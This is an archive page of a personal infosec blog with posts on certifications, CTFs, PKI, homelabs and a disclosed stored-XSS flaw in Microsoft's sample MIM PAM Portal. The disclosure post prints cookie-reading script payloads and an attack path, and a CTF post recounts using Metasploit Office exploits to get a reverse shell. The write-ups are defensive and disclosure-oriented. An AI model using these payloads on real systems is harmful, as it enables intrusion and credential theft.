View or add comments (curr. 0)

Almost time for another Beta exam: CompTIA CySA+

2019-12-05 09:31:00

I've got my exam planned for Monday and I'm looking forward to it. I'll mostly treat it as a recon mission, doing it part for fun and part to see if I'd like to take the exam "for real" should I not pass.

I've got a sneaking suspicion I won't pass this time around though (unlike the Linux+, Pentest+ and CFR-310 betas) because my experience keeps tripping me up. Sounds like a #HumbleBrag, I know, sorry :D What I mean is that CompTIA mostly seems targeted at US-based SMB, while my experience comes from EU-based international enterprises. I've been doing a few of Jason Dion's test-exams for the previous version, to get into the right mindset, but I fail a lot of questions because of the aforementioned factors.

Well, let's see how it turns out. For now, I'll just go and have fun with it :)


kilala.nl tags: , ,

View or add comments (curr. 0)

"If it were easy, I wouldn't be doing this"

2019-11-18 20:59:00

bob ross

... That's what I told my classmate B. (their ballet blog is here) tonight: "if it were easy, I wouldn't be doing this." That's what I honestly believe: I often do things because they're a challenge. Hence why I kind of live by Bob Ross' quote shown to the left.

Or as Nobel laureate Craig Mello put it: "Ask yourself: “are you having fun?”. And sometimes it’s not fun, but there’s something at the back of your mind maybe saying: “if I can just figure this out”, you know? And when you do, finally do make sense of that thing, man! It’s so much better because it was hard!"

So, what are B., our classmates and myself learning?

Ballet.

I am learning ballet and have been for a few months now. I'm an uncoordinated ditz, struggling with basics, but I'm loving it even when I'm hating it. The hating is short and momentary, the loving is something that sticks. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

In many cases, just cramming for an exam won't work

2019-11-18 20:44:00

Today, someone on Reddit posted the following question

"I have the [...] practice exams, I typed the entire [...] video course from YouTube and I just brought the exam cram book but no matter how much I study I don’t retain anything. Do you guys have tips?"

OP ran into the wall that is learning styles: cramming simply doesn't work for everybody! I'm no expert by any means, but I did explain the following:

It is entirely possible that your current method simply does not suit your personal learning style! If you start poking around the web a little bit, researching learning styles, you will find very quickly that there are many different methods!

You can try and keep brute-forcing your learning the way you have right now, but maybe that will simply not get the results you want. Why not have a think about your days in primary, middle and high school? What did the classes you did best in have in common?

Perhaps you're someone who simply needs something else than quiet self-study, taking notes while listening to a teacher.

Personally I have found that I put great importance on putting new information into context. I don't want to learn floating, individual topics, I want to put them into a context that I'm already familiar with, or build a context around them. This helps me better understand the new material's place. One thing that could help you with this is making mind maps.

Or perhaps you're someone who better learns by doing then by hearing. I understand that playing around with new tools and concepts in a lab can take a lot of time, but there's a reason why many books include lab exercises for the reader. It is often said that people learn <20% by hearing and >50% by doing.

Finally, it is also often said that one way to solidify and test your understanding of a subject, is to explain the topic to somebody else. If you can explain X or Y to a friend, your partner or a rubber ducky, then you can be sure that you've come to a proper understanding. Or perhaps you will find a few gaps in your knowledge that you need to fill out. Either way, it's a win-win.

 


kilala.nl tags: ,

View or add comments (curr. 0)

Zine: "The tale of the Dubious Crypto", a pentesting adventure

2019-11-08 16:15:00

A broken padlock

If you've met me IRL, you will most likely have seen me doodling or drawing. It's an almost compulsory thing for me! I've often said that drawing is like my brain's "Idle Process", running in the background making sure I pay attention to things around me, like meetings or phone calls.

Over the past 30+ years I've mostly drawn for my own enjoyment, though I've also published yonkoma comics about my daily life and even tried my hand at a short story or two. In 2019 things took a new turn after b0rk (Julia) and SailorHG (Amy) inspired me to make a "zine".

To sum it up, a "zine" (short for magazine) is a self-published booklet about subject matter that's dear to the author's heart. The Public have a made a wonderful zine explaining zines (how meta!), which is available here: An Introduction To Zines.

For starters, I'll write about things I've learned during my work and studies which I feel are well-worth sharing with others. The first issue, "The tale of the Dubious Crypto" covers Windows security practices and bad cryptography implementations in a piece of software I pen-tested.

You can find all upcoming releases, including printing instructions and license information, over here -> https://github.com/tsluyter/Zines


kilala.nl tags: , ,

View or add comments (curr. 0)

PenTester Academy CRTP exam

2019-10-22 14:24:00

Ooooffff... What a night. What a day. I'm beat :)

It's hard to believe that my OSCP examination took place 2.5 years ago. It feels much more recent! Or maybe that's wishful thinking...

Anywho, over the past twentyfour hours I repeated the experience by taking part in PenTester Academy's CRTP exam: Certified Red Team Professional. It's the closure piece to their "Attacking & Defending AD" online training

I'm gonna say that this exam is absolutely not a red-teaming exercise (per Deviant Olam). RT would include attacks on both the physical space, human employees and on IT resources. And this exam squarely focuses on IT only. So the "RT" in "CRTP" is badly chosen, but alright. Let's put it down as marketing.

So! There are a few reviews out there about the CRTP (like Truneski's, or this thread on TechExams, and Spentera's), but as always I'm going to quickly recap my own experiences.

To get the obvious question out of the way: was it worth it? I got in at the introductory price of $550 for 90 days (normally $600) and either way I'd say "Heck yes!". Fourteen hours of video material and a well-built lab environment to hack Active Directory made it well worth it! 

Nikhil's videos are well-made and are perfect for playing at 1.3x or 1.5x speed.  The slide deck and lab guides are certainly good enough as well. 

It's great how the training explains multiple ways to achieve the same goal, though at times it became hard to tell them apart :D That's mostly a failing of my own though. It has become very much apparent that I need to go back and review these materials a few times before fully grasping these AD attacks. Luckily there are many great resources, like the harmj0y, adsecurity and Specter Ops blogs.

Excluding the exam, I spent roughly sixty (60) hours on the videos, labs and research. That's a lot of CPE for my CISSP, CEH and CompTIA certs!

The exam! Ooohhh, I loved it! It's like OSCP, where you're given a twentyfour hour window to attack and pwn a number of target systems. But where OSCP offers X amount of disparate hosts, CRTP has them tied together in an Active Directory environment. You're not attacking software on its vulnerabilities, no you're attacking an environment based on misconfigurations in AD or Windows!

Like ChrisOne in the TechExams thread I ran into a wall which would last me well over six hours. Here's a rough timeline (it's no secret that there are five target hosts, so I feel it's safe to describe the timeline):

You will notice that things moved really fast once I got onto the second target host. That's because my enumeration of the domain objects had provided me with a clear path of attack to move from the second through to the fourth one. The fifth one was pretty cut and dry from there on out, but it required more manual labour. 

Getting privesc on my workstation only took so long because I didn't want to outright get started with that. :) I first wanted to put as much time as possible into properly enumerating the domain.

By 2230, exactly twelve hours after the start of my exam, was I done with the attacks. I'd gathered notes and lots of evidence while attacking, so all that remained was writing the report. That's where things took a turn for the nostalgic: it played out like my OSCP exam! I wanted to take a nap before writing the report, but really could not get to sleep. So by 0030 I was up and writing again! And finally, five hours later at 0530, I submitted roughly 36 pages of report to PTA.

Fingers crossed! I'm hoping for good news!


kilala.nl tags: , ,

View or add comments (curr. 3)

Ooofff, what a week (yes, still alive)

2019-10-04 20:01:00

And to think that I used to be such a diligent blogger! Weekly, or even daily updates! And now I've been quiet for almost three months?! Either, I've got nothing going on in my life, or way too much! :p Hint: it's the latter.

This week has been awesome!

I snagged my first official CVE, an XSS in Micro Focus Enterprise Server. I'd been sitting on that one for a few months now, so I can finally gloat a little bit :)

===

Last night was PvIB's annual CTF. Lemme tell you, it was a lot harder than in the previous years! I only managed to grab one of the "easy" flags. I learned a few cool new things though that I hadn't done before.

Most importantly: using Wireshark to decrypt TLS traffic in a PCAP. I had assumed that you would need the server's private key to do so, which turned out to be correct :) In this case the traffic had been encrypted with a private key which a malware creator had accidentally leaked. Had I Googled the subject's name on the certificate earlier, then I'd have found the private key much sooner as well ;)

===

Speaking of challenges: I took ${CLIENT}'s internal secure programming training for DevOps engineers this week. The training's a bit rough around the edges, but it covers a lot of important stuff for folks building web apps. I'm pretty impressed and also a bit daunted about teaching it in a few weeks. 

I'm now horribly aware that my webdev experience is 15 years old and antiquated. I've never even done much Javascript, let alone Flask, Angular, Jinja, and so on. So that's a challenge.

I took the exam for the course today: it was great! Like a mini OSCP where you're given a webapp with 15+ known vulnerabilities (ranging from CSRF, through XXE and SSTI through broken deserialization and JWT tokens). Lost of those things I'd not heard of yet! 

Anyway: you have nine hours! Find all the vulns, exploit them, suggest fixes and remedies and then report it all correctly. Nine hours?! That was a slog, even having full white-box access to the Docker container and all the sources.


kilala.nl tags: ,

View or add comments (curr. 0)

Yes, I'm still here! Just very busy

2019-07-31 21:48:00

It's been three months since I last posted publicly. Don't worry, I'm still here :) I just have a lot of things going on.

In our private life lots of things are also going on, but I'll leave those for another time and place.


kilala.nl tags: ,

View or add comments (curr. 1)

CTF036 2019, the Secured By Design CTF

2019-04-05 09:10:00

Me, on stage

The photograph on the left was provided by Secured By Design.

I love CTFs and though I can't take part in a lot of them, I make it a point to always play in Secured By Design's CTF036. Four years in a row now and the events just keep getting better! 

I was invited to give a small talk again, this time covering the basics of PKI: public key infrastructure. In short, PKI is one of the ways to solve the challenge of "trust" in an environment: how can you trust that someone or something really is whom they claim to be? We were very much cramped for time, so I had to try and smush everything into half an hour! While the talk went smoothly, I'm not entirely happy: there was just too much info in too little time. And I didn't even cover it all! 

My slide deck for "When Alice met Bob..." is over here. 

The CTF itself was, as always, a blast! Roughly a hundred participants, attacking six copies of the same target environment: three servers and two desktop systems, part of a fake school's infrastructure. Our goal was to grab as many student IDs as possible. 

The usual suspects were there yet again: weak passwords on mailboxes, SMB shares without proper ACLs, simulated end-users and a rudimentary daemon which you could try a buffer overflow on.

I spent most of my time on attacking one of the end users: a professor. The school's website featured an open forum, with sections dedicated to each of the classes taught. One professor warned his students that their final presentations were due any day now and that they should be submitted "through the usual share". This refers to the aforementioned, open SMB share which had a subfolder "Presentations". 

I recalled that SETookit and Metasploit offered options to create Word/Powerpoint/Office payloads, but had forgotten how to. I'm rusty, it's been a while since I've done this :) After a bit of research, I turned to exploit/windows/fileformat/office_OLE*. When configuring the exploit I simply chose to target all possible options, which generated roughly twenty files with shellcode. In real life this would obviously not work, because who would fall for that?! Twenty files without content, clicking through all of them? Nope :) But in this case the script set up on the workstation (to simulate the professor) was greedy and simply went through all of them. 

Using this method I got a nice and shell_reverse_tcp to my port 443. Looking to escalate my privileges on the workstation I tried to get a Meterpreter payload to run in the same way, but failed. I guess the payload was too tricky for the target. 

I explained this particular attack vector to two teams (ex-colleagues to my right, the team in #1 slot to my left), which was a fun exercise. I love explaining stuff like this to people who're just getting their feet wet (my ex-colleagues). The #1 team quickly latched onto the idea and offered an improvement to the attack: use the reverse shell to download a Meterpreter payload .EXE file. Duh! I should've thought of that! 

Anyway: a wonderful day with fun hacking and meeting cool people! Heartily recommended :)


kilala.nl tags: , ,

View or add comments (curr. 1)

PKI: using a private versus a public ca

2019-04-05 06:17:00

This morning an interesting question passed through the SANS Advisory Board mailing list:

"Looking for anyone that has done a cost benefit analysis, or just general consideration, of using a Public CA vs. a Private CA for a PKI deployment. Some vendors are becoming very competitive in this space and the arguments are all one-sided. So aside from cost, I’m looking for potential pitfalls using a public CA might create down the road."

My reply:

My previous assignment started out with building a PKI from scratch. I’d never done this before, so the customer took a gamble on me. I’m very grateful that they did, I learned a huge amount of cool stuff and the final setup turned out pretty nicely! I’ll try and tackle this in four categories.

UPSIDES OF PRIVATE PKI

 

UPSIDES OF PUBLIC PKI

 

DOWNSIDES OF PRIVATE PKI

 

DOWNSIDES OF PUBLIC PKI

If your infrastructure needs to be cut off from the outside world, you will HAVE to run your own, private PKI. 

I’ve recently presented on the basics of PKI and on building your own PKI, be it for fun, for testing or production use. The most important take-away was: “If you’re going to do it, do it right!”. You do NOT simply fire up a Linux box with OpenSSL, or a single instance Windows Server box with ADCS and that’s that. If you’re going to do it right, you will define policy documents, processes and work instructions that are to be strictly followed, you’ll consider HA and DR and you’ll include HSMs (Hardware Security Modules). The latter are awesomely cool tech to work with, but they can get pricy depending on your wants and needs. 

Remember: PKI might be cool tech, but the point of it all is TRUST. And if trust is damaged, your whole infrastructure can go tits-up. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Solved: Citrix Receiver - Cannot create connection file CitrixID

2019-03-24 14:12:00

Error message and creation

Earlier this week I had a need to use Citrix Receiver on MacOS, to connect to a remote desktop environment. That's a pretty normal use-case :) Unfortunately it kept throwing me an error: "Cannot create connection file CitrixID". 

Looking around the web it seems that plenty of people run into this issue, with plenty of hokey "fixes" going around. None of them got to the root of the issue. But here you are: the root cause!

When installing Citrix Receiver, the installation script uses your admin-rights to run a few commands using the actual root-account. Kind of yucky, but not very abnormal. The problem is that the scripts also creates configuration directories in your personal homedirectory. For example in "/Users/tess/Library/Application Support/Citrix Receiver". As you can see from the screenshot above, these directories and files are assigned root ownership, meaning that your normal user account cannot access or overwrite these files. 

The solution consists of either A) changing the ownership to your account and group, or B) just hard-removing these directories and re-creating them. Option A is neater and either requires use of the Terminal (sudo chown -R tess:tess "/Users/tess/Library/Application Support/Citrix Receiver"), or you can try with with the Info-view of the directory and changing the permissions from there. 


kilala.nl tags: ,

View or add comments (curr. 0)

Adding your own, trusted CA certificates in RedHat and Debian derivatives

2019-03-12 20:02:00

The past week I've gotten my start in an Ansible course and a book, starting my work towards RedHat's EX407 Ansible exam. I've been wanting to get a start in Ansible, after learning a lot about Puppet a few years back. And if I manage to pass EX407 it'll renew my previous RedHat certs, which is great. 

Anywho! The online course has its own lab environment, but I'm also applying all that I learn to my homelab. So far Ansible managed the NTP settings, local breakglass accounts and some systems hardening. Next stop was to ensure that my internal PKI's certificates get added to the trust stores of my Linux hosts. I've done this before on RedHat derivatives (CentOS, Fedora, etc), but hadn't done the trick on Debian-alikes (Ubuntu, Kali, etc) yet. 

First stop, this great blog post by Confirm IT Solutions. They've provided an example Ansible playbook for doing exactly what I want to do. :) I've taken their example and I'm now refactoring it into an Ansible role, which will also work for Kali (which unfortunately has unwieldy ansible_os_family and ansible_distribution values).

To summarize the differences between the two distributions:

RedHat expects:

Debian expects:


kilala.nl tags: , ,

View or add comments (curr. 2)

IT testlabs (homelabs) for everyone

2019-03-02 07:29:00

This article was posted to my LinkedIn, here.

Not too long ago I was in a SANS course, about the Critical Security Controls. More than once our teacher Russell nudged us, suggesting that "you could be applying these to your home network as well!" which brought us to the subject of testlabs. "What would make a good testlab for us?" was something asked along the way.

To sum things up: it really doesn't have to be glamorous! As long as your lab helps you experiment and learn, it's a good lab for your! So here's a few quick reminders for IT folks who would like to get their feet wet in setting up their own labs. 

Many homelabs have humble beginnings: if you have some spare room on your PC or laptop, you're good to go! If you throw the free and open source VirtualBox software on there, you can get started running a small number of VMs right away. Want something more polished? Take a look at VMWare's or Parallel's offerings! Both offer prosumer solutions for the private environment, that allow you to run a few VMs without incurring too much costs. And if you're already running Linux, there's always the fan-favorites KVM and Qemu.

So what do you put into that shiny, new lab of yours? Well, whatever you like of course! 

If there's a course or exam you're studying for, run the relevant software in your lab. Tinker with it. Mess with it. Break it and fix it. Then do some unexpected funny business with it. Enjoy yourself! 

Need to learn new software for work? Want to try a new programming language? Feeling nostalgic and want to run those old games from yesteryear? Throw it into your lab!

Then after a few years, you may start feeling cramped. There's only so many VMs you can run in the spare space of your day-to-day computer. What to do? What to do?! You can't exactly go out and buy some expensive, enterprise-grade hardware, can you? ... Or, could you? ;)

This is when you turn to resources like OpenHomeLab and /r/homelab. There are many ways of getting performant virtualization platforms for relatively little money. For example, if you feel spendy you could put together your own server hardware from a source like SuperMicro, or buy a new Intel NUC. The latter are tiny powerhouses that can be easily tucked away and which don't make a lot of noise (spouse-friendly!). 

Want to be more frugal? Turn to one of the many hardware refurbishing companies in your area. Their whole purpose is to buy older enterprise equipment, clean it up and resell it to second-hand buyers. Do your research and you'll find some really great stuff out there.

With your newfound enterprise hardware it's also time to move to enterprise-level virtualization! Huzzah! New things to learn! And there are so many great choices! Windows Server comes with Hyper-V. Linux comes with KVM and Qemu. And there's always the tried-and-true (and FREE!) VMWare ESXi. Or if you're feeling daring, take a look at the awesome ProxMox

To illustrate the aforementioned, here's my own story:

To sum things up: just get stuck in! Start small and keep learning!


kilala.nl tags: ,

View or add comments (curr. 0)

Network segmentation in the homelab

2019-03-01 22:36:00

My network layout

Continuing where I left off a few weeks ago, I've redone the network design for my homelab. When we last looked at the network, it was all flat with all VMs tucked in a single subnet behind a pfSense router. Because I want to work towards implementing the CSC in my lab, I've moved everything about quite a lot.


kilala.nl tags: , ,

View or add comments (curr. 0)

GCCC certification achieved

2019-02-28 14:39:00

It's been two weeks since finishing my index of the SEC566 course materials. This morning, I took the GCCC certification exam and passed with a 93% score! Yay!

On to the next big thing: RedHat's EX407 Ansible exam :)


kilala.nl tags: ,

View or add comments (curr. 2)

Be a good netizen: enable SPF to prevent email spoofing for your domain

2019-02-25 09:57:00

Continuing with security improvements all site and domain admins can apply: everybody that runs their own domain can and should implement SPF: Sender Policy Framework.

What it does, is explicitly tell the whole Internet which email servers are allowed to send email on behalf of your domain(s). Like many similar advertisements, this is achieved through DNS records. You can handcraft one, but if things get a bit too complicated, you can also use the handy-dandy SPF Wizard.


kilala.nl tags: , ,

View or add comments (curr. 0)

GIAC GCCC index and studying

2019-02-18 20:29:00

a stack of books

Ooofff!! I've spent the past three weeks building my personal index for the SANS SEC566 course books. It was quite a slog because the books are monotonous (twenty chapters with the exact same layout and structure), but I've made it through! 29 pages with 2030 keywords.

The index was built using the tried and true method made famous by Hacks4Pancakes and other InfoSec veterans.

Right after finishing the index I took my first practice exam and scored a 90%. That's a good start!


kilala.nl tags: , ,

View or add comments (curr. 2)

Microsoft MIM PAM Portal and PAM REST API cross-site vulnerability

2019-02-07 18:11:00

 

If the screenshot above looks familiar to you, you need to pay attention. (Image source)

 

XSS attack on Microsoft's PAM Portal

Microsoft's MIM is a widely used identity management platform for corporate environments. Many MIM tutorials, guides and books (including Microsoft's own site) [1][2][3] refer to Microsoft's sample PAM portal [4] to demonstrate how a request handling frontend could work. In this context, PAM stands for: "Privileged Access Management". While some of these sources make it clear that this is merely a demonstration, I can say without a doubt that there are companies that put this sample PAM portal to use in production environments. [5][6][7][8] Let me restate: there are enterprises putting the sample PAM Portal into production!

In short, the PAM portal allows an authenticated user to activate MIM "roles", which in turn will add groups to their account on-demand. By activating a role, MIM interacts with Active Directory and adds the groups configured for the role, to the end user's account. Unfortunately the sample PAM portal is not suited for production and I suspect that it has had little scrutiny with regards to the OWASP Top 10 vulnerabilities.

The cross-site scripting vulnerability that I ran into concerns the "Justification" field shown in the screenshot below. (Image source)

When activating a role, the end-user is presented with a popup asking for details of the request. The field labeled "justification" allows free entry of any text. It is not sanitized and the length appears to be limited to 400 characters. Through testing I have proven the ability to enter values such as:

<script>alert("Hello there, this is a popup.");</script>
<script>alert(document.cookie);</script>

 

These Javascript snippets are entered into the backend database without sanitation or conversion. The aforementioned 400 characters limit is easily enough for instructions to download and run shell code.

If we look at "Roles.js" on the Github page we see the following, where the form contents are loaded directly into a variable, without sanitation.

  $("form#createRequestForm").submit(function(e){
        var roleId = $("#roleIdInput").attr("value"); 
        var justification = $("#justificationInput").val();
        ... ...
        $.when(createPamRequest(justification,roleId,reqTTL,reqTime))
        ... ...

The "createPamRequest" function is defined in "pamRestApi.js", where yet again the input is not sanitized. 

function createPamRequest(reqJustification, reqRoleId, reqTTL, reqTime) {
    var requestJson = { Justification: reqJustification, RoleId: reqRoleId, RequestedTTL: reqTTL, RequestedTime : reqTime };
    return $.ajax({
        url: BuildPamRestApiUrl('pamrequests'),
        type: 'POST',
        data: requestJson,
        xhrFields: {
            withCredentials: true
        }
    })
}

The XSS comes into play when browsing to the "Requests" (History) or the "Approvals" tabs of the sample PAM portal. These pages respectively show the user's own history of (de)activation and other user's requests that are pending approval. After entering the code snippets above, visiting the "History" tab results in two popups: one with the short message and another one blank, as there are no cookie contents.

 

Attack vectors

One viable attack vector would be:

  1. Attacker has access to a valid Active Directory account (either stolen or their own account).
  2. Attacker requests access to a role that requires approval from a privileged administrator.
  3. As justification, attacker enters Javascript or similar programming that includes shellcode.
  4. Privileged administrator visits the "Approvals" tab and the shellcode is run on their computer, using their privileges.
  5. The attacker has now gained access to the privileged administrator's computer with their credentials.

 

Root Cause for the cross-site scripting: MIM PAM REST API

The aforementioned sample PAM portal is a collection of Javascript bundles and functions, thrown together with some CSS and HTML. It has no database of its own, nor any data of its own. All of the contents are gathered from the MIM (Microsoft Identity Manager) database, through the MIM JSON REST API.

Based on the previously discussed vulnerability we can conclude that the MIM JSON REST API does not perform input validation or sanitation! At the very least not on the "Justification" field. The Javascript code I entered into the form was passed directly through the JSON API into the MIM database and was later pulled back from it (for the "Requests" and "Approvals" pages).

I have also verified this by delving directly into the database using SQL Management Studio. The relevant field in the database literally contains the user's input. There is no transcoding, no sanitation, etc.

 

Resolution by Microsoft

I reported these issues to Microsoft through their responsible disclosure program in December, right before the holidays. After investigating the matter internally, they have provided a fix to the sample PAM Portal. The January 2019 revision of the code is no longer suceptible to an XSS attack.

Microsoft's resolution consists of hardening the coding of the PAM Portal itself: no data retrieve from the database will be interpreted as HTML. Instead it is hard-interpreted as plain text. Refer to the Github pull request chat for details.

They have NOT adjusted the MIM PAM REST API, which will continue to accept and store any user input offered. This means that accessing the API through Invoke-WebRequest is still susceptible to an XSS attack, because I-WR will happily run any Javascript code found. I showed this with examples earlier this week.

 

Mitigation

Anyone using the Microsoft MIM PAM Portal in their network should upgrade to the latest version of the project as soon as possible.

Also, if you are using the Powershell command Invoke-WebRequest to access the MIM PAM REST API, you should always adding the flag -UseBasicParsing.

 

Sources

  1. O'Reilly Microsoft Identity Manager
  2. TLK Tech Identity Thoughts
  3. Microsoft docs
  4. Sample PAM Portal
  5. Microsoft TechNet forums
  6. Microsoft TechNet forums (2)
  7. Microsoft TechNet forums (3)
  8. Just IDM

kilala.nl tags: , ,

View or add comments (curr. 0)

Surprise! Invoke-WebRequest runs Javascript

2019-02-04 13:45:00

Well! It's been an interesting month, between work and a few vulnerabilities that I'd reported to a vendor. And now there's this little surprise!

Imagine that you're using Powershell's Invoke-WebRequest command in your management scripts, to access an API or to pull in some data. It happens, right? Nothing out of the ordinary! While I was pentesting one particular API, I decided to poke at it manually using Invoke-WebRequest, only to be met with a surprising bonus! The Javascript code I'd sent to the API for an XSS-attack was returned as part of the reply by the API. Lo and behold! My I-WR ran the Javascript locally!

Screenshot 1 shows the server-side of my proof-of-concept: Python running a SimpleHTTPServer, serving up "testpage.html" from my laptop's MacOS.

In the image above you'll also see the Unix/Linux/MacOS version of curl, which simply pulls down the whole HTML file without parsing it.

Now, the image below shows what happens when you pull in the same page through Invoke-WebRequest in Powershell:

Fun times!

This means that every time you run a curl or Invoke-WebRequest on Windows, you'd better be darn sure about the pages you're calling! This Javascript alert is benign enough, but we all know the dangers of cross-site scripting attacks or just plain malevolent Javascript! Annoyingly, I have not yet found a way to disable JS-parsing in these commands. Looks like it can't be done.

What's worse: these commands are often included in scripts that are run using service accounts or by accounts with administrative privileges! That runs afoul of Critical Security Control #5: controlled use of administrative privileges! (More info here @Rapid7). Basically, you're running a whole web browser in your scripting and tooling!

So be careful out there folks! Think before you run scripts! Check before you call to URLs you're not familiar with! Trust, but verify!

EDIT: I've sent an email to Microsoft's security team, see what they think about all this. I mean, I'm sure it's a well-known and documented fact, but personally I'd feel a lot safer if I had the option to disable scripting (like JS) in Invoke-WebRequest.

EDIT: It looks like the only way to disable Javascript in Invoke-WebRequest, is to disable it in the Internet Explorer browser. Guess that makes sense, because doesn't I-WR use the IE engines?

Update and correction

After discussing the matter with the security team of Microsoft, I have come to understand that I have misunderstood the documentation provided for Invoke-WebRequest. It turns out that you can easily protect yourself from this particular problem by always adding the flag -UseBasicParsing.


kilala.nl tags: , ,

View or add comments (curr. 3)

Homebrew CMS security improvements

2019-02-02 21:07:00

Did you know that Mozilla offer a great resource called Observatory? This tool scans your website and provides you focused instructions on how to improve the basic security of your site. It'll help you prevent the most common causes for XSS, CSRF and more! With about an hour's work, I've taken my site from an F score to A+ :)

Now, it's been ages since I've first started work on this website of mine. Can't properly recall when I first started, but it's been at least tens years since version 1.0. I will readily admit that I'm an utter, utter hack: self-taught, borrowing code left and right, just trying to get things work. Along the way I've picked up security lessons, mostly on how to prevent SQLi and XSS. And now, thanks to Observatory I've learned more! 

Mozilla's web security guidelines document has been a great help! Until this week I'd never heard of HSTS or CSP, so I've taken time to improve my site's security posture. This included properly sourcing my own Javascript and diking out a lot of the JS I'd been sourcing externally (reCaptcha, Google Analytics, etc), just because they were dead weight to me. I had heard about SRI before through Troy Hunt's excellent article about Javascript supply chain security.

Anywho. It's been a learning experience! This little blog of mine ain't pretty, nor very exciting, but it's my little home and it makes a nice testbed to practice coding.

Some useful resources that helped me along:


kilala.nl tags: ,

View or add comments (curr. 0)

The (alleged) Ed Skoudis Plan For Success

2019-01-20 07:27:00

In our field we often learn that attribution is hard. In this case it amounts to no more than hearsay. So let's discuss the alleged Ed Skoudis Plan For Success(tm). On our last day at SEC566, our trainer Russel gave us some parting wisdom among which an anecdote. To paraphrase: 

I asked Ed, "Ed, how did you get this far in your career?" and he said "You know? Years and years back, I decided that every day I would take one to two hours for myself and study something new". And that's what I've been doing for the past ten years: every morning I get up at five, knowing I've got the house to myself for at least two hours. the first two days I spent them catching up with email or reading infosec news. But then I thought, there's gotta be a better way to spend this time. So I set myself study goals.

This is a message I can get behind! Mostly because I've been doing the exact same thing for the past six years. ^_^

It's only missing one thing: direction.

Before 2010 I had some less-than-fun experiences with studying. My previous employer had a very rigid process for certification, requiring you to pass through a certain strict of (what I considered to be very drab) certifications before allowing you to move on to the fun stuff. So I'd turned into someone who didn't enjoy studying: it was a "must" instead of a "want". 

Now, studying for my CISSP around that time changed things a bit! I spent weeks upon weeks working through that fat book, doing exercises and research, taking a bootcamp to earn that valued cert. And it was great! But then I turned into a CISSP slacker.

But things got better! Because in 2013 I had enough of it! I'm not a fscking slacker, I'm a professional! Sure, everybody has got their hangups, as do I. So I tackled them! I turned to my best friend and brother-from-another-mother Menno and asked him for choaching. The life-coaching kind of style. I'm very grateful for the help he offered me at the time. 

One of the things to come from those coaching sessions is direction. There we go! The missing ingredient! And the funny things is that what's needed, is already in the title of this post: a plan

Make yourself a plan!

At the time I made a plan that would allow me the bare minimum to retain my CISSP status. That was the first hurdle to take, allowing me more freedom to move and breathe once it'd been taken. Well it worked! And instead of settling back into the slacking I'd done before I started setting myself goals and challenges in the form of certifications. It's not that I believe certifications to be the silver bullet to a great career, but setting them as a goal tends to provide focus: you have to study hard enough, with a certain deadline, to make the cut. 

Initially I consulted friends and collagues to find which certs would provide value to my resumé, which led to the RHCSA and RHCE certs. And from there on, things just kept rolling and expanding! Classes left and right, webinars and videos from infosec conventions and more and more certifications. 

The most important things I've learned:

Without knowing it, I was following Ed's plan all this time. And it has brought me far. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

My experiences as SANS Facilitator (SEC566)

2019-01-17 19:27:00

EDIT:

Oooff... Linking to my homebrew website on a SANS Twitter-feed; how's that for #LivingDangerously? For the love of cookies, please don't hack me. I like my Dreamhost account... ^_^

 

 

About a month ago I explained a bit about the amazing chance I'd been offered by SANS, when they accepted me into their Work/Study Program. My week with SANS is coming to its end, so I thought I'd share a few of my experiences. Quite a few others have shared their stories in the past (linked below), but this is mine. :)

 

As was expected the days are pretty long and the work is hard. But for me they haven't been unbearably long, nor impossibly hard. Overall the atmosphere at SANS Amsterdam has been pretty laidback! 

Before coming to town, our event managers had set up a WhatsApp group so we could stay in close contact before and during the event. This turned out to be very helpful, as we could keep messaging eachother during class through the magic of WA's webapp. You can count on silly memes flying through that chat, but it's been mostly useful :)

Sunday was spent moving and unpacking 250 boxes of books into the respective eight rooms. There's a rather specific layout that SANS want their student-tables to be in (books stacked exactly so-and-so, pen here w/ yellow cap there, logo pointing here and so on. As another Facilitator said: "Clearly someone has put a lot of thought into this...". I've found that, after putting the boxes on the ground in a circle around me, I got into the rhythm of making the stacks real quickly. Setting up the mics and speakers and rigging powerlines was a nice flashback to my days with AnimeCon

Choosing not to stay at an Amsterdam hotel has been both a boon and a burden. Traveling home allows me to see my family every night and saves me quite some dough. It'll also take my head out of SANS a little bit, so I can unwind. On the other hand I'm missing out on the nightly sessions and NetWars

Working with the SEC566 trainer Russell has been nothing but a pleasure. As he himself said, he's "pretty low maintenance". He doesn't need me to go around town to grab things for him, just make sure his water bottles are always available and that the room's ready for use. So instead, most of my time went to the rest of the party: cleaning the room, prepping for the next day and making sure that the other students are "in a good place". A few people were having issues with their lab VMs, some folks had questions about practical SANS matters and others were simply looking for a nice chat. 

Speaking of: I can honestly say that it's been a long while since I've spent time with such a friendly group of people! I know that some folks on the web have been complaining that the InfoSec industry has been toxifying in recent years, but at least we didn't notice anything'bout that at SANS Amsterdam. I've met quite a few fun and interesting people here! 

In short: I am very grateful for the opportunity SANS have given me and I would recommend applying for the role to anyone in a heartbeat!

 

 

EDIT: Because some people have asked, here's my "normal" workday as Facilitator, traveling from home in Almere to Amsterdam.

 

During the lab exercises I usually work ahead, so I'm one chapter ahead of the class. That will allow me to know upfront what kind of problems they may run into and may need help with. As others on TechExams.net have pointed out, Facilitators are NOT the same as TAs (teaching assistants). So on the one hand I am constantly a bit anxious about whether or not I'm butting into the trainer's ground. On the other hand I've had good responses from both classmates and the trainer, so I reckon I didn't tick anyone off... At least not this time :D

I can imagine that it'd be entirely different in a tech-oriented class. I'd have to pipe down a lot more than I did this week. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Homelab: network segregation

2019-01-11 21:06:00

So far I've built a few VMs in my homelab, to house my AD DS and AD CS services (the Directory Services and PKI respectively). There's also a few CentOS 7 boxen spinning up to house Graylog and ElasticSearch

Up until this point, all these VMs were getting their IP addresses from our home's internal network infrastructure. Of course it's always a bad idea to mix production and dev/test environments, so I've set up segregation between the two. The easiest way to achieve this will also help me achieve one of my goals for 2019: get acquainted with the pfSense platform.

pfSense is a BSD-based, open source platform for routers/firewalls that can be run both as a VM or on minimalistic ARM-hardware. In my case, I've done a setup comparable to Garrett Mills' example on Medium.com. In short:

  1. I have defined a new virtual switch in VMWare, tied to one of the unused NICs of the Dell R410.
  2. This new virtual switch ("LabLAN") is then tied to a newly created port group, also called "LabLAN".
  3. The pfSense VM is assigned two NICs: one tied to the default "VM Network" port group, which leads to the used NIC on the R410, and the other tied into the "LabLAN" port group.
  4. After installing pfSense, the "VM Network" NIC is indicated as the WAN-interface, with the "LabLAN" NIC being the LAN-interface.
